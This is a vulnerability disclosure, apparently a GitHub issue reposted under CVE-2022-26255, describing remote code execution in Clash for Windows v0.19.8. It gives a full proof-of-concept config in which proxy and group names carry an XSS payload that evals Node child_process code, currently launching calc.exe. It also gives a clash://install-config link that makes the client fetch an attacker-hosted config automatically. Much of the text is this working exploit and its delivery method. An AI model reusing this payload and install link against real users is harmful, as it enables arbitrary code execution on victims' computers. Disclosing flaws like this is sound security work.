Headline
CVE-2022-26255: [Bug]: Remote Code Execution/远程代码执行 · Issue #2710 · Fndroid/clash_for_windows_pkg
Clash for Windows v0.19.8 was discovered to allow arbitrary code execution via a crafted payload injected into the Proxies name column.
Clash For Windows is powered by Electron. If a XSS payload is in the name of proxies, we can remotely execute any JavaScript code on the victim’s computer.
version: 0.19.8 (there are other vulnerability triggers in version 0.19.9, it’s exactly 0.19.9)
port: 7890 socks-port: 7891 allow-lan: true mode: Rule log-level: info external-controller: :9090 proxies:
- name: a<img/src="1"/onerror=eval(`require(“child_process”).exec(“calc.exe”);`);> type: socks5 server: 127.0.0.1 port: “17938” skip-cert-verify: true
- name: abc type: socks5 server: 127.0.0.1 port: “8088” skip-cert-verify: true
proxy-groups:
name: <img/src="1"/onerror=eval(\`require("child\_process").exec("calc.exe");\`);>
type: select
proxies:
- a<img/src="1"/onerror=eval(\`require("child\_process").exec("calc.exe");\`);>
put the evil config file to internets and use clash:// to install it, clash_for_windows_pkg will download and switch to it automaticlly .
clash://install-config?url=http%3A%2F%2F1.1.1.1%3A8888%2F1.txt&name=RCE